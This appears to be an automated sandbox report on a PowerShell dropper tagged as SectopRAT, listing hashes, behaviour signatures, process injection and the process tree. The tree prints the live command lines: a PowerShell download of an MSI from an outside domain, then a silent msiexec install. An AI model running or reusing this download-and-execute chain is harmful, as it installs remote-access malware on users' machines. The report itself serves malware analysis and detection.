Analysis
-
max time kernel
137s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
02/04/2025, 22:44
Static task
static1
General
-
Target
code.ps1
-
Size
128B
-
MD5
d8fb7b85741db93be10e3ed1363e32e7
-
SHA1
2b464dce118e15d86c14a3e967acea2ac333f9c3
-
SHA256
673e0d68fb4bf7faa06edab316d1fbc9cad8b10237cde5f3020b7feb45383048
-
SHA512
9023651ed98a14a2b5c579f4a61270daa337548c93169963d65cf2d9d10f1e2560e8b32874fca357acabacd8554394f369c106b95cda4c3add539870da9638af
Malware Config
Signatures
-
SectopRAT payload 1 IoCs
resource yara_rule behavioral1/memory/820-1448-0x0000000000400000-0x00000000004D4000-memory.dmp family_sectoprat -
Sectoprat family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4760 created 3380 4760 CasPol.exe 55 -
Blocklisted process makes network request 2 IoCs
flow pid Process 7 4168 powershell.exe 17 4168 powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 2472 vmnetdhcp.exe 820 CasPol.exe -
Loads dropped DLL 5 IoCs
pid Process 2004 MsiExec.exe 2004 MsiExec.exe 2004 MsiExec.exe 2004 MsiExec.exe 4760 CasPol.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\S: msiexec.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2472 set thread context of 4760 2472 vmnetdhcp.exe 109 PID 2472 set thread context of 5068 2472 vmnetdhcp.exe 111 PID 4760 set thread context of 820 4760 CasPol.exe 115 -
Drops file in Windows directory 12 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSIE7F1.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE86F.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIE999.tmp msiexec.exe File opened for modification C:\Windows\Installer\e57e35b.msi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\SourceHash{05E46191-7BCB-4049-A621-B435063F3BBD} msiexec.exe File created C:\Windows\Installer\e57e35f.msi msiexec.exe File created C:\Windows\Installer\e57e35b.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIE55F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE754.tmp msiexec.exe -
pid Process 2872 powershell.exe -
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vmnetdhcp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gpupdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe -
Suspicious behavior: EnumeratesProcesses 19 IoCs
pid Process 2872 powershell.exe 2872 powershell.exe 4168 powershell.exe 4168 powershell.exe 4288 msiexec.exe 4288 msiexec.exe 2472 vmnetdhcp.exe 2472 vmnetdhcp.exe 2472 vmnetdhcp.exe 2472 vmnetdhcp.exe 4760 CasPol.exe 4760 CasPol.exe 4760 CasPol.exe 4760 CasPol.exe 5068 gpupdate.exe 5068 gpupdate.exe 5068 gpupdate.exe 4760 CasPol.exe 4760 CasPol.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 2472 vmnetdhcp.exe 2472 vmnetdhcp.exe 2472 vmnetdhcp.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2872 powershell.exe Token: SeDebugPrivilege 4168 powershell.exe Token: SeShutdownPrivilege 1544 msiexec.exe Token: SeIncreaseQuotaPrivilege 1544 msiexec.exe Token: SeSecurityPrivilege 4288 msiexec.exe Token: SeCreateTokenPrivilege 1544 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1544 msiexec.exe Token: SeLockMemoryPrivilege 1544 msiexec.exe Token: SeIncreaseQuotaPrivilege 1544 msiexec.exe Token: SeMachineAccountPrivilege 1544 msiexec.exe Token: SeTcbPrivilege 1544 msiexec.exe Token: SeSecurityPrivilege 1544 msiexec.exe Token: SeTakeOwnershipPrivilege 1544 msiexec.exe Token: SeLoadDriverPrivilege 1544 msiexec.exe Token: SeSystemProfilePrivilege 1544 msiexec.exe Token: SeSystemtimePrivilege 1544 msiexec.exe Token: SeProfSingleProcessPrivilege 1544 msiexec.exe Token: SeIncBasePriorityPrivilege 1544 msiexec.exe Token: SeCreatePagefilePrivilege 1544 msiexec.exe Token: SeCreatePermanentPrivilege 1544 msiexec.exe Token: SeBackupPrivilege 1544 msiexec.exe Token: SeRestorePrivilege 1544 msiexec.exe Token: SeShutdownPrivilege 1544 msiexec.exe Token: SeDebugPrivilege 1544 msiexec.exe Token: SeAuditPrivilege 1544 msiexec.exe Token: SeSystemEnvironmentPrivilege 1544 msiexec.exe Token: SeChangeNotifyPrivilege 1544 msiexec.exe Token: SeRemoteShutdownPrivilege 1544 msiexec.exe Token: SeUndockPrivilege 1544 msiexec.exe Token: SeSyncAgentPrivilege 1544 msiexec.exe Token: SeEnableDelegationPrivilege 1544 msiexec.exe Token: SeManageVolumePrivilege 1544 msiexec.exe Token: SeImpersonatePrivilege 1544 msiexec.exe Token: SeCreateGlobalPrivilege 1544 msiexec.exe Token: SeRestorePrivilege 4288 msiexec.exe Token: SeTakeOwnershipPrivilege 4288 msiexec.exe Token: SeRestorePrivilege 4288 msiexec.exe Token: SeTakeOwnershipPrivilege 4288 msiexec.exe Token: SeRestorePrivilege 4288 msiexec.exe Token: SeTakeOwnershipPrivilege 4288 msiexec.exe Token: SeRestorePrivilege 4288 msiexec.exe Token: SeTakeOwnershipPrivilege 4288 msiexec.exe Token: SeRestorePrivilege 4288 msiexec.exe Token: SeTakeOwnershipPrivilege 4288 msiexec.exe Token: SeRestorePrivilege 4288 msiexec.exe Token: SeTakeOwnershipPrivilege 4288 msiexec.exe Token: SeRestorePrivilege 4288 msiexec.exe Token: SeTakeOwnershipPrivilege 4288 msiexec.exe Token: SeRestorePrivilege 4288 msiexec.exe Token: SeTakeOwnershipPrivilege 4288 msiexec.exe Token: SeRestorePrivilege 4288 msiexec.exe Token: SeTakeOwnershipPrivilege 4288 msiexec.exe Token: SeRestorePrivilege 4288 msiexec.exe Token: SeTakeOwnershipPrivilege 4288 msiexec.exe Token: SeRestorePrivilege 4288 msiexec.exe Token: SeTakeOwnershipPrivilege 4288 msiexec.exe Token: SeRestorePrivilege 4288 msiexec.exe Token: SeTakeOwnershipPrivilege 4288 msiexec.exe Token: SeRestorePrivilege 4288 msiexec.exe Token: SeTakeOwnershipPrivilege 4288 msiexec.exe Token: SeRestorePrivilege 4288 msiexec.exe Token: SeTakeOwnershipPrivilege 4288 msiexec.exe Token: SeRestorePrivilege 4288 msiexec.exe Token: SeTakeOwnershipPrivilege 4288 msiexec.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 2872 wrote to memory of 4168 2872 powershell.exe 87 PID 2872 wrote to memory of 4168 2872 powershell.exe 87 PID 2872 wrote to memory of 1544 2872 powershell.exe 104 PID 2872 wrote to memory of 1544 2872 powershell.exe 104 PID 4288 wrote to memory of 2004 4288 msiexec.exe 107 PID 4288 wrote to memory of 2004 4288 msiexec.exe 107 PID 4288 wrote to memory of 2004 4288 msiexec.exe 107 PID 4288 wrote to memory of 2472 4288 msiexec.exe 108 PID 4288 wrote to memory of 2472 4288 msiexec.exe 108 PID 4288 wrote to memory of 2472 4288 msiexec.exe 108 PID 2472 wrote to memory of 4760 2472 vmnetdhcp.exe 109 PID 2472 wrote to memory of 4760 2472 vmnetdhcp.exe 109 PID 2472 wrote to memory of 4760 2472 vmnetdhcp.exe 109 PID 2472 wrote to memory of 4760 2472 vmnetdhcp.exe 109 PID 2472 wrote to memory of 4760 2472 vmnetdhcp.exe 109 PID 2472 wrote to memory of 5068 2472 vmnetdhcp.exe 111 PID 2472 wrote to memory of 5068 2472 vmnetdhcp.exe 111 PID 2472 wrote to memory of 5068 2472 vmnetdhcp.exe 111 PID 2472 wrote to memory of 5068 2472 vmnetdhcp.exe 111 PID 4760 wrote to memory of 820 4760 CasPol.exe 115 PID 4760 wrote to memory of 820 4760 CasPol.exe 115 PID 4760 wrote to memory of 820 4760 CasPol.exe 115 PID 4760 wrote to memory of 820 4760 CasPol.exe 115 PID 4760 wrote to memory of 820 4760 CasPol.exe 115 PID 4760 wrote to memory of 820 4760 CasPol.exe 115 PID 4760 wrote to memory of 820 4760 CasPol.exe 115 PID 4760 wrote to memory of 820 4760 CasPol.exe 115
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3380
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\code.ps12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c iwr https://mfktiaoaolfkfjzjk.com/plu -OutFile C:\Users\Public\7bc.msi3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4168
-
-
C:\Windows\system32\msiexec.exe"C:\Windows\system32\msiexec.exe" /i C:\Users\Public\7bc.msi /qn3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1544
-
-
-
C:\Users\Admin\AppData\Local\Temp\31084\CasPol.exe"C:\Users\Admin\AppData\Local\Temp\31084\CasPol.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:820
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4288 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 4298310646C57AF54FBEFD6915C7BB452⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2004
-
-
C:\Users\Admin\AppData\Roaming\Cruse\vmnetdhcp.exe"C:\Users\Admin\AppData\Roaming\Cruse\vmnetdhcp.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Users\Admin\AppData\Local\Temp\31084\CasPol.exeC:\Users\Admin\AppData\Local\Temp\31084\CasPol.exe3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4760
-
-
C:\Windows\SysWOW64\gpupdate.exeC:\Windows\SysWOW64\gpupdate.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5068
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
11KB
MD5700b2d5cdfd705687e125a317f252c1c
SHA1165bad01ac732314bdd8daf5d45ccfad0e294977
SHA2560271df480b636d7128d44ea395b78de8b0ee2e7cd988a4d0a7b18b789c3ad959
SHA512dd777c5b2ee4344735c76dddea816e64a557abcf7f253ebe5c37a4032d2c58cf5baf8a446821af603e90618309a1011c8b70bcc8c64f988bb60006151a8f3fa7
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
64B
MD553b052154f5bf90cec9c30e8c8a2c4ae
SHA1ef4d136bf9e71e7db9d2442f45cfb2cd00a84ce8
SHA25681b52e6f7aa4899827173ec107909ca5ccdd3e6e8d8190f15200115f3d097e91
SHA512088dad2662cdaa1b120c8bbb25624748600f82b8ab849d9dd150d874af361f8e5b26a5e2615909e29a0941287f58b28fa9f23849a6eb9303655eb0ea14346cba
-
Filesize
99KB
MD5f61fa5ce25f885a9b1f549055c9911ed
SHA1aba1c035b06017b0b0bd1c712669646e4f3765ab
SHA25657e9675902b443085e37ead57dfed97de6bb61321682bc93aff30f16b5ca5aeb
SHA51202e3db343037294fd3b774f954c9a617a50715e6b89d7c409f3c7dc5a1cf5ed9418158c442e9e80111994da139a9a16db33ac68a833d6d115c4a41bdf75751ac
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.9MB
MD51c016531f2b109e3c8e06895188c3c79
SHA10f56fc7890cadb94a1029474912dab7b146a7376
SHA2563e4dd65697cca5eae6361ea44145249a0978c945529d45015e4ede084977b99c
SHA51287dba3edec8951052b21230ce69c1d948d93268c86ed3d7e579d2c3341b9d03803ba8d76b5079f74590f41196eb15efebfb8530a0a646419500eef0cce83cc42
-
Filesize
2.7MB
MD59837db7cfdbc32f096d365936246ae29
SHA181aa4851bcaaa0f56286360735651066ed4a8f60
SHA256791f1854d6058b5b27ee393ed0a4828a2e04a1813da9c9ec2ab77ecb0980919f
SHA512dbf2220bf0c8b1ac894fd166c647f1e9cbe66af989e10cf47ae27670621ac92ef4449d520e911cc55f08c8d21f89e39d32e5ddcfe61013622a8721503cd603fa
-
Filesize
2.7MB
MD58b6418df4f08ab74044a83bfba52544f
SHA1736ee2bc67fa64ba4b4c31cbe206300a30fb78c4
SHA2568ed7f23a613a5f52cd987a95e5d8733d030cd5f5c91a5b59bc3f8a00738871a4
SHA512b3deee27771cd22fdbff6d89f60578e9bc07c6f8640d2016fe142408f9ea65ddac3b3aeb8145d8ccc9f2fd8ed4cf11e46ad6a21a2895ea4a18b9d4380bcd4a12
-
Filesize
5.0MB
MD5e58d905d9e1529e987c9a82a74ce29c9
SHA1b305eef82dc620e836ada7b56de9e98b077bf118
SHA25687f7e5081a34770f1277d101c4ae40126623195cbce621196bde10e46df704b1
SHA512ff0d482d98676b1ffdfdb82ce7ba1327bde0d92deee583335ea5d93e7e8aa81aeae9b59753646fc4d12ee553e7254f654caffaee28d3756030912c7ce729ccfb
-
Filesize
386KB
MD572b1c6699ddc2baab105d32761285df2
SHA1fc85e9fb190f205e6752624a5231515c4ee4e155
SHA256bf7f6f7e527ab8617766bb7a21c21b2895b5275c0e808756c2aadcd66eff8a97
SHA512cde1e754d8dfb2fa55db243517b5dd3d75b209ea6387ef2e4be6157875e536db2373f23434a9e66c119150301c7b7cdf97de5a5544d94c03247b4ae716cbc170